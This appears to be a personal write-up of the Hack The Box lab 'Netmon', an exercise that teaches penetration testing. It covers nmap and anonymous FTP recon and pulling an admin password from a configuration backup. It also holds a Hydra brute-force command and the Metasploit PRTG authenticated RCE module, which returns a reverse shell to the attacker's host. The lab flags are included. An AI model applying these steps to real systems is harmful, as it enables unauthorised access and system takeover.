Netmon

570KB

Netmon.pdf

pdf

TARGET IP: 10.10.10.152

HOST IP: 10.10.16.5

RECON

NMAP

• Start with NMAP scan.

nmap [Target IP]

• More detailed NMAP scan.

nmap -A -p 21,80,135,139,445 [Target IP]

• Items to note in scan:

  • FTP uses Microsoft FTP and allows for anonymous login wit what looks like a lot of directories available for browsing.

  • Port 80 is open with a title of PRTG Network Monitor (NETMON)

  • Port 445 is an SMB service with possible default credentials open.

• I decided to run a more thorough scan on Port 445 to see what versions of SMB are running to see if I can exploit any of them.

nmap -p 445 --script smb-protocols {TARGET IP]

• This shows that SMBv1 is allowed which isn't supported anymore due to the amount of vulnerabilities. Let's see if we can find any. See the exploits below.

FTP

FTP [Target IP]
Anonymous
<ENTER>
ls

• Let's start by downloading any files not nailed down.

• For some reason the .rnd file couldn't be downloaded and viewing the file was just giving me garbage. Could be encoded.

get .rnd

less .rnd

cd Users
cd Public
get user.txt

• On the host system open up the user.txt file for the flag.

cat user.txt

a9436db6e4461212b52f99f40c0767c5

• It looks like I can't get access to any other good parts of the system without Administrator privileges.

• Digging around more I found some useful credentials in the /Program Files (x86)/PRTG Network Monitor/cert directory.

• This includes some keys for PRTG. However, after digging around, these look to be mainly used to secure communications and can't be used for login.

  • Maybe there is a way to monitor or capture traffic that we can then decrypt with the keys?

• I grabbed a Log file located on the \Program Files (x86)\PRTG Network Monitor\PRTG Setup Log.log file and tried to grep some key words. I think I got a hit on the admin's email address:

get "PRTG Setup Log.log"
cat "PRTG Setup Log.log" | grep admin

• It looks like the admin's email address is na@na.com.

  • I have no idea what I can use this for unfortunately.

• Finally had to look up a hint. I fucking hate myself right now. Earlier on, I was trying to figure out if there was a way to see hidden files on the FTP server and didn't come across anything other than knowing what the hidden file is called.

  • I completely spaced on the fact that ProgramData is a hidden file on the root directory of Window's systems.

  • Here is a website that tells you where to find the Data Directory for the program as well. I just didn't bother trying to access it even though I couldn't see it.

cd ProgramData
cd Paessler
cd "PRTG Network Monitor

• In a zip file I found a chunk of information pertaining to the user prtgadmin:

</dateformat>
                <email>
                  na@na.com
                </email>
                <fixed>
                  1
                </fixed>
                <grpfoldsize>
                  10
                </grpfoldsize>
                <homepage>
                  /welcome.htm
                </homepage>
                <lastlogin>
                  43522.1088048495
                </lastlogin>
                <login>
                  prtgadmin
                </login>
                <name>
                  PRTG System Administrator
                </name>
                <ownerid>
                  100
                </ownerid>
                <password>
                  <flags>
                    <encrypted/>
                  </flags>
                  <cell col="0" crypt="PRTG">
                    JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA======
                  </cell>
                  <cell col="1" crypt="PRTG">
                    OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW

• Looks like the password get's encrypted but I wasn't able to decrypt it using Base64.

  • It's possible that I could use one of the keys I found to try to decrypt it with openssl.

• Screw that. I found a file called PRTG Configuration.old.bak and grabbed it.

get PRTG Configuration.old.bak
nano PRTG Configuration.old.bak
^W
prtgadmin

PrTg@dmin2018

• That didn't work either.

• I fucking hate this lab right now. It's 12 at night. I have been banging my head on the table for 8hrs now and this is what it gives me. Lesson learned.

• I had to go back to the walkthrough again. Looks like I was in the right area but since this password didn't work, I should instead try variations on it.

  • I don't think I would have ever figured that out myself. I'll keep it in mind for next time but for fucks sake.

  • Let's try PrTg@dmin2019. Well, what do you fucking no. It worked.

• Well, good thing I know how to exploit it from this point on. Now that I have a set of credentials, I can jump over to Metasploit to gain admin privileges. Check out the Exploit notes below.

HTTP

• In your web browser:

http://[Target IP]

• Looks like we have a login page. Here is the wappalyzer.

• Checking out the source code for the page gives us some interesting information.

  • Unfortunately, nothing that really stood out.

• I googled some default credentials for the PRTG Network Monitor and got

prtgadmin:prtgadmin

• Unfortunately, none of these worked. I also tried some other usual credentials but no luck. I will come back to this in the enumeration.

• I've been beating my head on the table for a while on this one. I eventually checked out the Forgot Password link and tried the username credential above, prtgadmin.

• When I try other usernames though, I get the following message. This means that there is definitely a username of prtgadmin.

• I attempted to use Hydra to brute force the password and came up with a lot of different answers which was wierd. Unfortunately, none of these worked.

hydra -l prtgadmin -P [PATH TO WORDLIST] [TARGET IP] http-post-form "/public/login.htm:username=^USER^&password=^PASS^:Your login has failed. Please try again'!'"

Enumeration

Gobuster

• No luck here for some odd reason.

gobuster dir -u http://[Target_IP]/ -w /usr/share/dirb/wordlists/common.txt

• I even tried excluding the error codes and wasn't getting anything back.

gobuster dir -u http://[Target_IP]/ -w /usr/share/dirb/wordlists/common.txt -e 302,404,500

Exploit

PRTG

• I found an exploit to gain administrator privileges to the system through the PRTG account using CVE-2018-9276. There is also a Metasploit exploit that can leverage this. However, I need to already be logged into an administrator account.

• The link above references a CVE-2018-19410 which allows you to create a new admin user account but I only found one written-down POC and it unfortunately did not work for me.

• I gained credentials from browsing the FTP site.

prtfadmin:PrTg@dmin2019

• Let's jump over to Metasploit to gain admin privileges.

msfconsole
search prtg
use exploit/windows/http/prtg_authenticated_rce
show options
set admin_password PrTg@dmin2019
set rhosts [TARGET IP]
set lhost [HOST IP]
exploit

• You should now have a Meterpreter reverse shell. Type the following to get a command shell and verify you are the Administrator.

shell
whoami

SMB

• Based on the NMAP scan it shows that SMBv1 is allowed.

  • I checked to see if it was vulnerable to EternalBlue but no luck using Metasploit.

  • I also check on a few others.

• I also tried logging into the SMBClient with the guest account as the NMAP scan showed it available but it looks as though it has been disabled.

• Type the following to see the root.txt file.

type C:\Users\Administrator\Desktop\root.txt

adb0e6563ee3febfeb2f0f5ef82e9dcc